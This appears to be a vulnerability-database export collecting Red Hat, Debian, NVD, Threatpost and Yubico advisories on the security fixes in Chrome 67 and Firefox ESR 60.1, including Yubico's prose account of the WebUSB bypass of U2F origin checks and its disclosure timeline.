[{"lastseen": "2019-08-13T18:44:43", "bulletinFamily": "unix", "description": "Chromium is an open-source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 67.0.3396.62.\n\nSecurity Fix(es):\n\n* chromium-browser: Use after free in Blink (CVE-2018-6123)\n\n* chromium-browser: Type confusion in Blink (CVE-2018-6124)\n\n* chromium-browser: Overly permissive policy in WebUSB (CVE-2018-6125)\n\n* chromium-browser: Heap buffer overflow in Skia (CVE-2018-6126)\n\n* chromium-browser: Use after free in indexedDB (CVE-2018-6127)\n\n* chromium-browser: Out of bounds memory access in WebRTC (CVE-2018-6129)\n\n* chromium-browser: Out of bounds memory access in WebRTC (CVE-2018-6130)\n\n* chromium-browser: Incorrect mutability protection in WebAssembly (CVE-2018-6131)\n\n* chromium-browser: Use of uninitialized memory in WebRTC (CVE-2018-6132)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-6133)\n\n* chromium-browser: Referrer Policy bypass in Blink (CVE-2018-6134)\n\n* chromium-browser: UI spoofing in Blink (CVE-2018-6135)\n\n* chromium-browser: Out of bounds memory access in V8 (CVE-2018-6136)\n\n* chromium-browser: Leak of visited status of page in Blink (CVE-2018-6137)\n\n* chromium-browser: Overly permissive policy in Extensions (CVE-2018-6138)\n\n* chromium-browser: Restrictions bypass in the debugger extension API (CVE-2018-6139)\n\n* chromium-browser: Restrictions bypass in the debugger extension API (CVE-2018-6140)\n\n* chromium-browser: Heap buffer overflow in Skia (CVE-2018-6141)\n\n* chromium-browser: Out of bounds memory access in V8 (CVE-2018-6142)\n\n* chromium-browser: Out of bounds memory access in V8 (CVE-2018-6143)\n\n* chromium-browser: Out of bounds memory access in PDFium (CVE-2018-6144)\n\n* chromium-browser: Incorrect escaping of MathML in Blink (CVE-2018-6145)\n\n* chromium-browser: Password fields not taking advantage of OS protections in Views (CVE-2018-6147)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2018-06-09T14:13:38", "published": "2018-06-08T00:24:56", "id": "RHSA-2018:1815", "href": "https://access.redhat.com/errata/RHSA-2018:1815", "type": "redhat", "title": "(RHSA-2018:1815) Important: chromium-browser security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:40", "bulletinFamily": "unix", "description": "Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.1.0 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 61, Firefox ESR 60.1, and Firefox ESR 52.9 (CVE-2018-5188)\n\n* Mozilla: Buffer overflow using computed size of canvas element (CVE-2018-12359)\n\n* Mozilla: Use-after-free using focus() (CVE-2018-12360)\n\n* Mozilla: Media recorder segmentation fault when track type is changed during capture (CVE-2018-5156)\n\n* Skia: Heap buffer overflow rasterizing paths in SVG (CVE-2018-6126)\n\n* Mozilla: Integer overflow in SSSE3 scaler (CVE-2018-12362)\n\n* Mozilla: Use-after-free when appending DOM nodes (CVE-2018-12363)\n\n* Mozilla: CSRF attacks through 307 redirects and NPAPI plugins (CVE-2018-12364)\n\n* Mozilla: address bar username and password spoofing in reader mode (CVE-2017-7762)\n\n* Mozilla: Compromised IPC child process can list local filenames (CVE-2018-12365)\n\n* Mozilla: Invalid data handling during QCMS transformations (CVE-2018-12366)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting these issues. Upstream acknowledges Alex Gaynor, Christoph Diehl, Christian Holler, Jason Kratzer, David Major, Jon Coppeard, Nicolas B. Pierron, Marcia Knous, Ronald Crane, Nils, F. Alonso (revskills), David Black, and OSS-Fuzz as the original reporters.", "modified": "2018-08-17T00:53:56", "published": "2018-06-28T18:54:49", "id": "RHSA-2018:2112", "href": "https://access.redhat.com/errata/RHSA-2018:2112", "type": "redhat", "title": "(RHSA-2018:2112) Critical: firefox security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:44:52", "bulletinFamily": "unix", "description": "Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.1.0 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Memory safety bugs fixed in Firefox 61, Firefox ESR 60.1, and Firefox ESR 52.9 (CVE-2018-5188)\n\n* Mozilla: Buffer overflow using computed size of canvas element (CVE-2018-12359)\n\n* Mozilla: Use-after-free using focus() (CVE-2018-12360)\n\n* Mozilla: Media recorder segmentation fault when track type is changed during capture (CVE-2018-5156)\n\n* Skia: Heap buffer overflow rasterizing paths in SVG (CVE-2018-6126)\n\n* Mozilla: Integer overflow in SSSE3 scaler (CVE-2018-12362)\n\n* Mozilla: Use-after-free when appending DOM nodes (CVE-2018-12363)\n\n* Mozilla: CSRF attacks through 307 redirects and NPAPI plugins (CVE-2018-12364)\n\n* Mozilla: address bar username and password spoofing in reader mode (CVE-2017-7762)\n\n* Mozilla: Compromised IPC child process can list local filenames (CVE-2018-12365)\n\n* Mozilla: Invalid data handling during QCMS transformations (CVE-2018-12366)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank the Mozilla project for reporting these issues. Upstream acknowledges Alex Gaynor, Christoph Diehl, Christian Holler, Jason Kratzer, David Major, Jon Coppeard, Nicolas B. Pierron, Marcia Knous, Ronald Crane, Nils, F. Alonso (revskills), David Black, and OSS-Fuzz as the original reporters.", "modified": "2018-06-28T18:59:53", "published": "2018-06-28T18:55:24", "id": "RHSA-2018:2113", "href": "https://access.redhat.com/errata/RHSA-2018:2113", "type": "redhat", "title": "(RHSA-2018:2113) Critical: firefox security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2019-05-30T05:52:36", "bulletinFamily": "info", "description": "Google updated its Chrome browser to version 67.0.3396.62 on Tuesday patching 34 bugs and adding support for the credential management API called WebAuthn. The update will be available in the coming days for Windows, Mac and Linux platforms, Google said.\n\nMost notably to the browser update are mitigations for Spectre. The fix includes an added feature called Site Isolation that essentially separates the processes between different tabs \u2013 so that if one tab crashes, the others will continue to work. This also protects against speculative side-channel CPU vulnerabilities like [Spectre](<https://threatpost.com/intel-responds-to-news-of-spectre-like-flaw-in-cpus/132169/>) because it reduces the amount of data exposed to side channel attacks.\n\n\u201cWe\u2019re continuing to roll out Site Isolation to a larger percentage of the stable population in Chrome 67,\u201d said Chrome in its [security release](<https://chromereleases.googleblog.com/search/label/Stable%20updates>). \u201cSite Isolation improves Chrome\u2019s security and helps mitigate the risks posed by Spectre.\u201d\n\nBug fixes for Chrome 67 include nine rated high. One of them is an out of bounds memory access bug ([CVE-2018-6130](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6130>)) in Web Real Time Communication (WebRTC), which is an open-source project providing web browsers with real-time communication through simple APIs. Google also patched a heap buffer overflow glitch in open source graphics library Skia ([CVE-2018-6126](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6126>)) and an overly permissive policy bug ([CVE-2018-6125](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6125>)) in the WebUSB API, which provides a way to expose USB device services to the Web. Below is a full list of the vulnerabilities fixed that are rated high.\n\n> * CVE-2018-6123: Use after free in Blink.\n> * CVE-2018-6124: Type confusion in Blink.\n> * CVE-2018-6125: Overly permissive policy in WebUSB.\n> * CVE-2018-6126: Heap buffer overflow in Skia.\n> * CVE-2018-6127: Use after free in indexedDB.\n> * CVE-2018-6128: uXSS in Chrome on iOS.\n> * CVE-2018-6129: Out of bounds memory access in WebRTC.\n> * CVE-2018-6130: Out of bounds memory access in WebRTC.\n> * CVE-2018-6131: Incorrect mutability protection in WebAssembly.\n\nPart of the Google update also included the introduction of the [WebAuthn](<https://www.w3.org/TR/2018/CR-webauthn-20180320/>) API into Chrome 67. This API enables users to log into their accounts using alternative methods such as with biometric options ranging from fingerprint readers, iris scans or facial recognition. Mozilla has also recently packaged this feature into Firefox a few weeks ago with the release of [Firefox 60](<https://www.mozilla.org/en-US/firefox/60.0/releasenotes/>).\n\nFinally, the latest version of Chrome has deprecated the browser\u2019s support for HTTP public key pinning; instead adopting the more flexible solution of Expect-CT headers. This plan was first announced in [2017](<https://threatpost.com/google-to-ditch-public-key-pinning-in-chrome/128679/>) after Google argued that public key pinning runs the risk of leaving website admins open to difficulties selecting a reliable set of keys to pin to.\n\nChrome 67 for desktops is currently available. Android and Chrome OS versions will follow soon after.\n", "modified": "2018-05-30T15:32:20", "published": "2018-05-30T15:32:20", "id": "THREATPOST:06CF4AB78C7900E0E881A9B5B24C9D21", "href": "https://threatpost.com/google-patches-34-browser-bugs-in-chrome-67-adds-spectre-fixes/132370/", "type": "threatpost", "title": "Google Patches 34 Browser Bugs in Chrome 67, Adds Spectre Fixes", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-05-30T02:23:01", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4237-1 security@debian.org\nhttps://www.debian.org/security/ Michael Gilbert\nJune 30, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium-browser\nCVE ID : CVE-2018-6118 CVE-2018-6120 CVE-2018-6121 CVE-2018-6122\n CVE-2018-6123 CVE-2018-6124 CVE-2018-6125 CVE-2018-6126\n CVE-2018-6127 CVE-2018-6129 CVE-2018-6130 CVE-2018-6131\n CVE-2018-6132 CVE-2018-6133 CVE-2018-6134 CVE-2018-6135\n CVE-2018-6136 CVE-2018-6137 CVE-2018-6138 CVE-2018-6139\n CVE-2018-6140 CVE-2018-6141 CVE-2018-6142 CVE-2018-6143\n CVE-2018-6144 CVE-2018-6145 CVE-2018-6147 CVE-2018-6148\n CVE-2018-6149\n\nSeveral vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2018-6118\n\n Ned Williamson discovered a use-after-free issue.\n\nCVE-2018-6120\n\n Zhou Aiting discovered a buffer overflow issue in the pdfium library.\n\nCVE-2018-6121\n\n It was discovered that malicious extensions could escalate privileges.\n\nCVE-2018-6122\n\n A type confusion issue was discovered in the v8 javascript library.\n\nCVE-2018-6123\n\n Looben Yang discovered a use-after-free issue.\n\nCVE-2018-6124\n\n Guang Gong discovered a type confusion issue.\n\nCVE-2018-6125\n\n Yubico discovered that the WebUSB implementation was too permissive.\n\nCVE-2018-6126\n\n Ivan Fratric discovered a buffer overflow issue in the skia library.\n\nCVE-2018-6127\n\n Looben Yang discovered a use-after-free issue.\n\nCVE-2018-6129\n\n Natalie Silvanovich discovered an out-of-bounds read issue in WebRTC.\n\nCVE-2018-6130\n\n Natalie Silvanovich discovered an out-of-bounds read issue in WebRTC.\n\nCVE-2018-6131\n\n Natalie Silvanovich discovered an error in WebAssembly.\n\nCVE-2018-6132\n\n Ronald E. Crane discovered an uninitialized memory issue.\n\nCVE-2018-6133\n\n Khalil Zhani discovered a URL spoofing issue.\n\nCVE-2018-6134\n\n Jun Kokatsu discovered a way to bypass the Referrer Policy.\n\nCVE-2018-6135\n\n Jasper Rebane discovered a user interface spoofing issue.\n\nCVE-2018-6136\n\n Peter Wong discovered an out-of-bounds read issue in the v8 javascript\n library.\n\nCVE-2018-6137\n\n Michael Smith discovered an information leak.\n\nCVE-2018-6138\n\n Fran\u00e7ois Lajeunesse-Robert discovered that the extensions policy was\n too permissive.\n\nCVE-2018-6139\n\n Rob Wu discovered a way to bypass restrictions in the debugger extension.\n\nCVE-2018-6140\n\n Rob Wu discovered a way to bypass restrictions in the debugger extension.\n\nCVE-2018-6141\n\n Yangkang discovered a buffer overflow issue in the skia library.\n\nCVE-2018-6142\n\n Choongwoo Han discovered an out-of-bounds read in the v8 javascript\n library.\n\nCVE-2018-6143\n\n Guang Gong discovered an out-of-bounds read in the v8 javascript library.\n\nCVE-2018-6144\n\n pdknsk discovered an out-of-bounds read in the pdfium library.\n\nCVE-2018-6145\n\n Masato Kinugawa discovered an error in the MathML implementation.\n\nCVE-2018-6147\n\n Michail Pishchagin discovered an error in password entry fields.\n\nCVE-2018-6148\n\n Micha\u0142 Bentkowski discovered that the Content Security Policy header\n was handled incorrectly.\n\nCVE-2018-6149\n\n Yu Zhou and Jundong Xie discovered an out-of-bounds write issue in the\n v8 javascript library.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 67.0.3396.87-1~deb9u1.\n\nWe recommend that you upgrade your chromium-browser packages.\n\nFor the detailed security status of chromium-browser please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/chromium-browser\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2018-07-01T01:01:06", "published": "2018-07-01T01:01:06", "id": "DEBIAN:DSA-4237-1:5AD61", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00166.html", "title": "[SECURITY] [DSA 4237-1] chromium-browser security update", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:11", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4220-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJune 08, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : firefox-esr\nCVE ID : CVE-2018-6126\n\nIvan Fratric discovered a buffer overflow in the Skia graphics library\nused by Firefox, which could result in the execution of arbitrary code.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 52.8.1esr-1~deb8u1.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 52.8.1esr-1~deb9u1.\n\nWe recommend that you upgrade your firefox-esr packages.\n\nFor the detailed security status of firefox-esr please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/firefox-esr\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2018-06-08T18:38:40", "published": "2018-06-08T18:38:40", "id": "DEBIAN:DSA-4220-1:6730A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00149.html", "title": "[SECURITY] [DSA 4220-1] firefox-esr security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2019-07-03T11:10:21", "bulletinFamily": "NVD", "description": "Incorrect handling of object lifetimes in WebRTC in Google Chrome prior to 67.0.3396.62 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page.", "modified": "2019-07-01T13:27:00", "id": "CVE-2018-6130", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6130", "published": "2019-06-27T17:15:00", "title": "CVE-2018-6130", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-07-03T11:10:22", "bulletinFamily": "NVD", "description": "CSS Paint API in Blink in Google Chrome prior to 67.0.3396.62 allowed a remote attacker to leak cross-origin data via a crafted HTML page.", "modified": "2019-01-14T19:14:00", "id": "CVE-2018-6137", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6137", "published": "2019-01-09T19:29:00", "title": "CVE-2018-6137", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-07-03T11:10:23", "bulletinFamily": "NVD", "description": "Lack of secure text entry mode in Browser UI in Google Chrome on Mac prior to 67.0.3396.62 allowed a local attacker to obtain potentially sensitive information from process memory via a local process.", "modified": "2019-01-29T19:03:00", "id": "CVE-2018-6147", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6147", "published": "2019-01-09T19:29:00", "title": "CVE-2018-6147", "type": "cve", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-07-03T11:10:21", "bulletinFamily": "NVD", "description": "Type confusion in ReadableStreams in Blink in Google Chrome prior to 67.0.3396.62 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page.", "modified": "2019-01-30T15:33:00", "id": "CVE-2018-6124", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6124", "published": "2019-01-09T19:29:00", "title": "CVE-2018-6124", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-03T11:10:22", "bulletinFamily": "NVD", "description": "Insufficient policy enforcement in Extensions API in Google Chrome prior to 67.0.3396.62 allowed an attacker who convinced a user to install a malicious extension to bypass navigation restrictions via a crafted Chrome Extension.", "modified": "2019-06-28T14:07:00", "id": "CVE-2018-6138", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6138", "published": "2019-06-27T17:15:00", "title": "CVE-2018-6138", "type": "cve", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2019-07-03T11:10:22", "bulletinFamily": "NVD", "description": "Information leak in Blink in Google Chrome prior to 67.0.3396.62 allowed a remote attacker to bypass no-referrer policy via a crafted HTML page.", "modified": "2019-06-27T19:14:00", "id": "CVE-2018-6134", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6134", "published": "2019-06-27T17:15:00", "title": "CVE-2018-6134", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-07-03T11:10:23", "bulletinFamily": "NVD", "description": "Off-by-one error in PDFium in Google Chrome prior to 67.0.3396.62 allowed a remote attacker to perform an out of bounds memory write via a crafted PDF file.", "modified": "2019-01-14T19:03:00", "id": "CVE-2018-6144", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6144", "published": "2019-01-09T19:29:00", "title": "CVE-2018-6144", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-03T11:10:21", "bulletinFamily": "NVD", "description": "A use after free in Blink in Google Chrome prior to 67.0.3396.62 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "modified": "2019-01-14T19:06:00", "id": "CVE-2018-6123", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6123", "published": "2019-01-09T19:29:00", "title": "CVE-2018-6123", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-10-04T12:26:42", "bulletinFamily": "NVD", "description": "Lack of clearing the previous site before loading alerts from a new one in Blink in Google Chrome prior to 67.0.3396.62 allowed a remote attacker to perform domain spoofing via a crafted HTML page.", "modified": "2019-10-03T00:03:00", "id": "CVE-2018-6135", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6135", "published": "2019-01-09T19:29:00", "title": "CVE-2018-6135", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-07-03T11:10:21", "bulletinFamily": "NVD", "description": "A precision error in Skia in Google Chrome prior to 67.0.3396.62 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page.", "modified": "2019-01-15T21:50:00", "id": "CVE-2018-6126", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6126", "published": "2019-01-09T19:29:00", "title": "CVE-2018-6126", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "yubico": [{"lastseen": "2019-10-18T00:31:51", "bulletinFamily": "software", "description": "\n\n## Security Advisory 2018-03-02 \u2013 WebUSB Bypass of U2F Phishing Protection\n\nTracking IDs: **YSA-2018-02**\n\n### _Update June 13, 2018_\n\nIn Chrome 61, released in September, 2017, Google included a feature called WebUSB. WebUSB allows websites to request direct access to USB devices through JavaScript. A web page could potentially access and interact with a USB device interface unless the operating system reserved exclusive access to that interface\n\nOn February 16, 2018, researchers Markus Vervier and Michele Orr\u00f9 [demonstrated](<https://youtu.be/pUa6nWWTO4o>) how to circumvent the [FIDO U2F](<https://www.yubico.com/solutions/fido-u2f/>) origin check using WebUSB at [OffensiveCon](<https://www.offensivecon.org/speakers/2018/markus-and-michele.html>). Yubico learned about this when we were contacted by a journalist at Wired Magazine on February 27, 2018. We reached out to Markus and Michele and they demonstrated the issue and showed us slides from their presentation on March 2, 2018. The research results we present below builds on Markus\u2019s and Michele\u2019s original work.\n\nThe origin check is performed by the FIDO Client (the web browser) and is a critical part of the U2F protocol that is used in preventing man-in-the-middle and phishing attacks. Markus and Michele showed how to use WebUSB to pass U2F requests to the USB CCID interface on the YubiKey NEO, thereby bypassing the origin check and creating a potential security issue. Yubico immediately began working with Google to remedy this issue and published a [security advisory](<https://www.yubico.com/support/security-advisories/ysa-2018-02/>) on March 2, 2018. \n\nThe researchers said at the time that this exploit only worked on U2F devices that \u201c_\u2026offer protocols for connecting to a browser other than the usual way FIDO U2F tokens communicate with a computer, known as the Human Interface Device or HID, which isn\u2019t vulnerable to the attack__._\u201d ([Wired](<https://www.wired.com/story/chrome-yubikey-phishing-webusb/>) Magazine, March 1, 2018).\n\nThe WebUSB security model was based on the theory that operating systems reserve exclusive access to certain sensitive USB device types, but it turns out that operating systems do not uniformly do so. Most U2F authenticators support U2F access only over the USB Human Interface Device (HID) interface. Linux does lock exclusive access to the USB HID interface. However, while investigating the claims in the article, we discovered that USB HID devices were accessible over WebUSB on other operating systems. \n\nUsing tools we developed for testing this, we were able to directly access all U2F devices we tested via HID, including those from other vendors than Yubico, bypass the origin check, and sign a fake U2F request. We are providing further details on our research and findings below. We first reported this issue to Google on March 1, 2018 and filed a [formal bug report](<https://bugs.chromium.org/p/chromium/issues/detail?id=818592>) with Google on March 5, 2018. It was addressed in Chrome 67 and given CVE number CVE-2018-6125.\n\n**_June 13th Update:_** We were just made aware that the original researchers reported the Windows HID issue to Google around the same time we submitted it to Google. We were not aware of this at the time, we independently discovered it while investigating the public CCID issue, and followed standard responsible disclosure practices by sending all our findings, including the Windows HID issue, only to the affected vendor in order to afford maximum protection for the ecosystem.\n\n### What Actions Do U2F Customers Need to Take?\n\nPlease update your Chrome browser to the latest version. Chrome 67 contains a device [block list](<https://github.com/chromium/chromium/blob/0aee4434a4dba42a42abaea9bfbc0cd196a63bc1/chrome/browser/usb/usb_blocklist.cc#L59>) and [interface class filtering](<https://github.com/chromium/chromium/blob/0aee4434a4dba42a42abaea9bfbc0cd196a63bc1/third_party/blink/renderer/modules/webusb/usb_device.cc#L520>). The latter prevents WebUSB access to audio, video, HID, mass storage, smart card and wireless controller interface classes. The former explicitly prevents access to certain sensitive devices, including a large number of U2F authenticators. This helps protect against using WebUSB to bypass the origin check, as well as a other potential problems. \n\nIn addition, we strongly recommend that customers be very careful with granting WebUSB access to any USB devices. The user must approve access on a per website, per device basis, but once it is granted, it is granted permanently. The user may, however, go to Chrome USB devices setting (<chrome://settings/content/usbDevices>) to manually revoke any granted access.\n\n### What Actions Do U2F Vendors Need to Take?\n\nU2F vendors\u2019 devices are likely protected by the blanket restrictions on access to HID devices. However, we encourage all vendors to evaluate if the U2F features of their devices are accessible over any other interfaces that are permitted by the U2F standard. If a particular interface class is not blocked, the vendor can request that Google add the device to the block list. \n\n### Details of the Issue \u2013 WebUSB Background\n\nWebUSB is a W3C community standard written by Google. Only Chrome implements this standard at this time. WebUSB enables device manufacturers and application developers to write device drivers in JavaScript for USB connected devices, enabling them to be accessed directly by any website on the Internet.\n\nThe goal of the WebUSB community group is to enable hardware manufacturers to develop web based applications that use their devices without installing drivers on the host computer. WebUSB was developed with the intent to to support hardware peripherals such as special-purpose educational, scientific and industrial devices in a sandboxed web application. Google enabled WebUSB by default in Chrome 61. There is currently no way for a customer to disable WebUSB in Chrome, nor can an enterprise administrator do so on a fleet of computers.\n\n### Report\n\nYubico learned of [Markus and Michele\u2019s](<https://www.offensivecon.org/speakers/2018/markus-and-michele.html>) research on February 27, 2018, Yubico began investigating immediately upon receiving notification of this issue, and published [a security advisory](<https://www.yubico.com/support/security-advisories/ysa-2018-02/>) on March 2, 2018.\n\n### Exploit Details\n\nThe U2F authentication flow is depicted in figure 1, below. The U2F protocol is designed to mitigate phishing attacks on web applications by ensuring that authentication requests originate from the correct site. This prevents a phishing site from executing a man-in-the-middle attack and gain access to a U2F protected site. The protocol requires the U2F client \u2013 the web browser \u2013 to perform this check. The U2F authenticator, in this case the YubiKey, cannot do so as it does not have access to the data required to do it, namely, the site the request was received from.\n\nBecause the browser is expected to verify the legitimacy of U2F requests, the hardware authenticator trusts, and responds to, is consequently a major security problem as it side-steps a key part of the U2F protocol.\n\n\n\nFigure 1 \u2013 FIDO U2F Authentication Flow\n\nIn a phishing attack, an attacker would create a malicious website that mimics the look and feel of the legitimate site.\n\nThe attacker then tricks the user into presenting their username and password to the malicious web app which transmits them to the legitimate site for verification. In a single-factor authentication scenario \u2013 i.e. where only a username and password is used for authentication, the attacker is now logged into the legitimate website as the user.\n\nWhen two-factor authentication using U2F is used, The legitimate site, after verifying the username/password, generates a challenge and sends it along with a \u201ckey handle\u201d and an AppID (relying party URL) to what it thinks is the user, but which in the phishing attack is actually a malicious web site. The key handle contains information that enables the U2F authenticator to sign the authentication request, and the AppID is used to perform the origin check. The malicious web site passes this information along to the U2F client \u2013 the customer\u2019s web browser. The browser verifies that the site it received the request from matches the AppID. In the phishing attack, this check fails, and the request is discarded.\n\nHowever, under WebUSB the malicious site requests direct access to the authenticator over WebUSB. The customer is asked to approve this request through a Google Chrome pop-up message. If approved, the malicious web site now sends the raw authentication request to the U2F authenticator via the WebUSB API. The authenticator has no way to determine that this request is not coming through the normal browser channel, and assumes the origin check has passed. Consequently, the authenticator signs to request and returns it to the phishing site. This is shown in Figure 2.\n\nMost U2F authenticators are USB devices that provide access to the U2F features over the USB HID interface. However, the U2F standard does not require that U2F is only permitted over HID and for different physical interfaces, other interface classes are used. For instance, a near-field communication (NFC) authenticator, such as the YubiKey NEO, provides U2F functionality over the chip card interface device (CCID) when used over NFC, and supports this interface over USB as well. This is permitted by the U2F standard. \n\nThe original researcher\u2019s report demonstrated how to bypass the origin checking by accessing the USB CCID interface via WebUSB. \n\n\n\nFigure 2 \u2013 FIDO U2F Phishing Attack Using WebUSB\n\n### Difference Between What Yubico Found and What Was Reported in February\n\nThe vulnerability that was reported to us in February mentioned that CCID is the only affected interface. Yubico\u2019s own researchers developed a mechanism to access HID devices that worked on Windows and Mac, enabling us to execute a man-in-the-middle attack under certain conditions on a far broader range of platforms using any USB U2F authenticator from any vendor. \n\nConsidering the significant impact of this discovery we opted to help protect all U2F customers by responsibly disclosing our findings to Google and working with Google to help protect our mutual customers.\n\n### Scope of the Issue\n\nCustomers running chrome version 61-66 are at risk from this issue. Customers who upgrade to Chrome 67 are protected.\n\n### Affected Protocols\n\nPrior to Chrome 67, WebUSB could also be used to attack other device types and protocols. For instance, Markus and Michele were able to use it to obtain a PGP signature from a PGP enabled YubiKey over WebUSB. A modified exploit could obtain a smart card signature from a USB-connected smart card (although those typically require the user to enter a PIN code).\n\n### Is This a Flaw in a Yubico Product?\n\nNo. Yubico successfully bypassed the origin check on all U2F authenticators we tested from multiple vendors. WebUSB enables phishing sites to bypass the U2F origin check, but the origin check is the responsibility of the U2F client \u2013 the web browser \u2013 not the authenticator. The YubiKey used in the original researcher\u2019s report operates exactly as intended and within the requirements of the U2F protocol. Other devices, such as smart cards, would also be directly accessible by WebUSB, enabling other exploit scenarios. The flaw is that WebUSB allows direct access to USB devices from web sites, bypassing protections the browser and the host OS are expected to perform.\n\n### Timeline\n\n2017-09-06 | Google releases Chrome 61 with WebUSB enabled by default \n---|--- \n2018-02-16 | Researchers give a talk at OffensiveCon about how they were able to generate an assertion from a YubiKey Neo using WebUSB over smart-card interface. \n2018-02-27 | Yubico notified about CCID issue and we started investigating \n2018-03-01 | Yubico researchers discover that HID interfaces can be claimed on Windows and does preliminary private outreach to Google with information on this finding. Google requests formal bug report \n2018-03-02 | Yubico talks to researchers about the CCID vector, and publishes a Security Advisory \n2018-03-03 | Researchers formally report ability to claim HID interfaces to Google. The content of this bug report was shared with Yubico on 2018-06-13 \n2018-03-04 | Yubico confirms that all the FIDO U2F tokens were affected by the WebUSB HID vulnerability \n2018-03-05 | Yubico formally notifies Google of the HID, NFC, and smartcard/CCID specific vulnerabilities in bug [818592](<https://bugs.chromium.org/p/chromium/issues/detail?id=818592>) \n2018-03-06 | Google disables WebUSB via remote kill switch \n2018-03-06 | Google rolls out Chrome 65 with blacklist for Yubico devices and other FIDO U2F devices manufactured by other vendors \n2018-03-07 | Google enables WebUSB with blacklist in place for Yubico devices \n2018-05-29 | Google rolls out Chrome 67 with interface class filtering for Audio, Video, HID, Mass Storage, Smart Card, Wireless Controller interface classes \n \n### \n\n### _Update March 7, 2018_\n\nToday, Google released Chrome 65. Chrome 65 blocks access to all impacted Yubico products over WebUSB, which protects against WebUSB Bypass of the U2F Phishing Protection against YubiKeys. This updated browser version also re-enables WebUSB. All YubiKey users are now protected from this unintended issue and we will continue to work with Google to ensure that Yubico customers remain protected.\n\nTo check whether you are using the latest version of Chrome, please 